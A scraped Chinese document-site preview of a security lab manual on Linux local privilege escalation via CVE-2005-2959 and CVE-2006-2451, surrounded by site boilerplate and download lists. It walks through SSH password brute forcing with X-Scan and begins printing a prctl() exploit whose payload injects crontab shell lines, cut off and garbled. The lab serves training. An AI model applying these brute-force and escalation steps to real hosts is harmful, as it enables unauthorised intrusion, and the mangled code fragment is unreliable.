- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
Linux漏洞利用(CVE-2005-2959、CVE-2006-2451)(SEC-L05-001.1)
Linux 操作系统是一款开源的类UNIX操作系统,有多种发行版(Distributions),如 RedHat Linux、SUSE Linux、Debian Linux等等等等。这些发行版在系统安装、包管理、桌面应用等方面各有特色,但是其操作系统内核(Kernel)均来自于一个组织(),该组织负责Linux内核的更新、发布。在部分已发布的内核版本中,存在一些严重影响操作系统安全的漏洞,Hacker 或 Cracker通过利用这些漏洞达到入侵并控制目标主机的目的,Cracker 甚至会通过这些漏洞入侵有问题的主机及该主机所在网络,以达到窃取保密信息、散播蠕虫木马、发起DDOS攻击等目的。
实验目的
通过2种不同漏洞的利用(内核调用漏洞及系统工具漏洞),对普通帐号进行本地提权,通过实际操作增加实验者对网络安全及主机操作系统安全的认识,对希望成为合格的 SA(System Administrator Security Administrator)的实验者进行系统漏洞类的部分基础知识介绍。
实验准备
熟悉了解相关的实验工具,掌握Putty,Putty SFTP,X-Scan等工具的使用,操作
下载实验中使用的工具:Putty(putty.exe)及 Putty SFTP 工具(psftp.exe)、SSH口令在线扫描工具X-Scan 、演示后门程序 ndoor。【说明】??putty.exe????一个小巧实用的远程登录客户端,支持多种协议。??psftp.exe?????Putty 工具集中的一个支持 SFTP 协议的客户端,用于通过SFTP协议上传下载文件。??x-scan????一款免费的网络扫描器,我们使用它的在线SSH口令扫描功能。??ndoor????用于演示的一个简单后门。
实验步骤
远程SSH服务口令暴力破解
步骤说明:
了解使用X-Scan扫描工具,探测被攻击服务器的SSH服务,实现口令自动猜测攻击
1.运行 xscan_gui.exe 启动X-Scan程序。?
2.选择菜单 设置 - 扫描参数,弹出参数设置窗口,左侧选中检测范围选项,在右侧的“指定IP范围”下的文本框中输入目标主机IP地址,如:图1?
?图1
3.点开左侧的全局设置,进一步设置参数,选中左侧的“扫描模块”,在右侧仅选中 SSH弱口令,如:图2?
?图2
4.为了加快扫描速度,适当增加扫描线程数,点击左侧的“并发扫描”,在右侧的ListBox中将ssh的扫描线程数修改为 30全局设置,如:图3?
?图3
5.点击左侧的“其他设置”,在右侧中仅选中“无条件扫描”,如:图4?
?图4
6.点开左侧的插件设置,选中“端口相关设置”,在右侧的“待检测端口”下的文本框中输入SSH服务的默认端口号22,如:图5?
?图5
7.选中左侧的“字典文件设置”,双击右侧的“SSH密码字典”及“SSH用户名字典”,分别设置为 ssh_pass.dic 及 ssh_user.dic,最后点击“确定”关闭参数设置窗口,如:图6?
?图6
8.点击绿色右三角图标开始扫描,扫描完成后,如:图7?
?图7
9.扫描完成后会自动打开系统默认浏览器显示扫描结果,在 X-Scan 工具主窗口也可以看到相应结果, 在左侧窗口中 “/” 前面是用户名,后面是密码;在“安全漏洞及解决方案”列中,“/” 前面是用户名,后面是密码,如:图8?
?图8
Linux本地提权1:利用内核调用漏洞(prctl()调用)
步骤说明:
使用 Putty 工具用普通帐号登录远程系统,利用exploit程序以达到提权目的。
1.用第一步获取的账户 tester(对此帐户进行提权) 登录远程主机,如:图9?
?图9
2.创建编写提权代码文件,如:图10命令格式:?
[tester@LT-courseware-0007~]$cat ex.c _EOF ?图10
3.输入提权源代码,如:图11代码内容如下:?
#include stdio.h#include sys/time.h#include sys/resource.h#include unistd.h#include linux/prctl.h#include stdlib.h#include sys/types.h#include signal.hchar *payload=\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n*
您可能关注的文档
最近下载
- 2020届中职数学对口升学复习第十一部分《概率与统计初步》基础知识点归.pdf VIP
- 课程教学大纲(中国思想史).doc VIP
- 《农产品低温保鲜技术》课件.ppt VIP
- 《中药调剂技术》课件——中药调剂的概念、起源与发展.pptx VIP
- 灾害心理:心理准备量表修订与信效度检验.docx VIP
- 化学工艺学烃类热裂解.pptx VIP
- TZS 0680—2025《医疗机构实验室生物安全管理组织架构规范》(水印版).pdf VIP
- 农机液压故障诊断与排除.pdf VIP
- 放射技师考试考试练习题资料.docx VIP
- 20211125【IT规划】神华集团公司信息化建设项目-信息化总体IT规划-应用架构_v2.3_FINAL.pptx VIP
文档评论(0)